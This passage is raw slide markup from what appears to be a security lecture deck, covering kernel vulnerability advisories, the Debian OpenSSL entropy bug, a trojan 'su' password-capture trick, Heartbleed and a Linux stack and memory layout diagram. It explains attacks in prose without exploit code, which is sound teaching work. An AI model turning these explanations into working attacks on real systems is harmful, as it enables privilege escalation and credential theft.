            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35895157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Kernel vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357445" y="1283653"/>
            <a:ext cx="11582400" cy="5347854"/>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elevation of privilege vulnerability exists in the NVIDIA GPU driver (gm20b_clk_throt_set_cdev_state), where an out of bound memory read is used as a function pointer could lead to code execution in the kernel. This issue is rated as high because it could allow a local malicious application to execute arbitrary code within the context of a privileged process. References: N-CVE-2017-6264.</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elevation of privilege vulnerability in the kernel security subsystem could enable a local malicious application to to execute code in the context of a privileged process. This issue is rated as High because it is a general bypass for a kernel level defense in depth or exploit mitigation technology. Versions: Kernel-3.18.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elevation of privilege vulnerability in the kernel ION subsystem could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Kernel-3.18.</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information disclosure vulnerability in the Qualcomm bootloader could help to enable a local malicious application to to execute arbitrary code within the context of the bootloader. This issue is rated as High because it is a general bypass for a bootloader level defense in depth or exploit mitigation technology.</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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7093413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Another kernel vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1692911"/>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On May 13th, 2008 the Debian project announced a vulnerability in the OpenSSL. The bug in question was caused by the removal of the following line of code from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>md_rand.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MD_Update(&amp;m,buf,j);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [ .. ] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MD_Update(&amp;m,buf,j); /* purify complains */ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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lines were removed because of Valgrind/Purify warnings related to use of unitinialized data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>.  In fact, this buffer was updated elsewhere and elimination removed all entropy from random number calculations.</a:t>
            </a:r>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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42377742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Other vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614001" y="1789896"/>
            <a:ext cx="10963997" cy="466344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An old favorite of mine</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You type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>su root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Password: ***********</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Unbeknownst to you, the attacker put an executable program called “su” in the directory you are in (like $HOME).</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Name resolution in unix shell (used to) search current directory first, then standard places like /bin, /usr/bin, …</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After attacker su gets the super user password, it calls the real su.</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Current shells make you expressly specify programs you want to execute in the current directory, e.g., ./a.out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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37601188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Protocol vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377292" y="2134319"/>
            <a:ext cx="11582400" cy="4336052"/>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CVE-2014-0160  (Heartbleed) The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.</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TLS, a long standing and critical internet protocol has been successfully attacked by increasingly sophisticated attacks for years but there are simplified safer protocols like Boring SSL and Quic.</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Some protocols are known to be vulnerable and while there are safe substitutes, they are often not deployed.  Example: DNS, DNSSec</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Protocol expertise is uncommon.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108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18425405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6175" y="266961"/>
            <a:ext cx="10399643" cy="958880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Linux process memory layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1845364" y="6210300"/>
            <a:ext cx="2819400" cy="381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unused</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4786287" y="5943601"/>
            <a:ext cx="1592103"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t>0x08048000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7173" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1845364" y="5562600"/>
            <a:ext cx="2825750" cy="6477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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7174" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1845364" y="4724400"/>
            <a:ext cx="2819400" cy="838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run time heap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7175" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1851714" y="3657600"/>
            <a:ext cx="2813050" cy="533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shared libraries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7176" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1851714" y="1676400"/>
            <a:ext cx="2819400" cy="762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user stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7177" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1845364" y="4191000"/>
            <a:ext cx="2819400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="6699FF"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7178" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1845364" y="2438400"/>
            <a:ext cx="2819400" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7179" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3216964" y="4191000"/>
            <a:ext cx="0" cy="5334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7180" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3216964" y="3124200"/>
            <a:ext cx="0" cy="5334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7181" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3216964" y="2438400"/>
            <a:ext cx="0" cy="5334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7182" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4779937" y="3962401"/>
            <a:ext cx="1592103"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t>0x40000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7183" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4658415" y="1447801"/>
            <a:ext cx="1657826" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>0xC0000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7184" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="383101" y="2209800"/>
            <a:ext cx="824264"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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7185" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1269102" y="2438400"/>
            <a:ext cx="576262" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7186" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="608194" y="4495801"/>
            <a:ext cx="564577"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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>brk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7187" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1192902" y="4724400"/>
            <a:ext cx="576262" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7188" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1497702" y="5562600"/>
            <a:ext cx="271462" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19883"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7189" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="166583" y="5470526"/>
            <a:ext cx="1444626" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Loaded </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from exec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7190" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1851714" y="5562600"/>
            <a:ext cx="2819400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7191" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1845364" y="4191000"/>
            <a:ext cx="2819400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7192" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1845364" y="1676400"/>
            <a:ext cx="2819400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7194" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1845364" y="6172200"/>
            <a:ext cx="2819400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98C7EF35-723A-3244-9F38-B7443F1572ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="2162175"/>
            <a:ext cx="3505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Parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A9473C2-9CE4-8242-A681-10503D7262BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="3457575"/>
            <a:ext cx="3505200" cy="457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Return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6657702D-6E49-6349-86F3-88289A3606EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="3990975"/>
            <a:ext cx="3505200" cy="457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Stack Frame Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0479E0F-DDFE-EE41-808B-3F7AD27E79EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="4524375"/>
            <a:ext cx="3505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Local variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F92BC9F-0E32-3742-B7E5-0B5762E38047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5454420" y="5486400"/>
            <a:ext cx="465191"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t>SP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E6797C8-6DCA-C24C-B934-F1250C6590A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6013246" y="5743575"/>
            <a:ext cx="544512" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
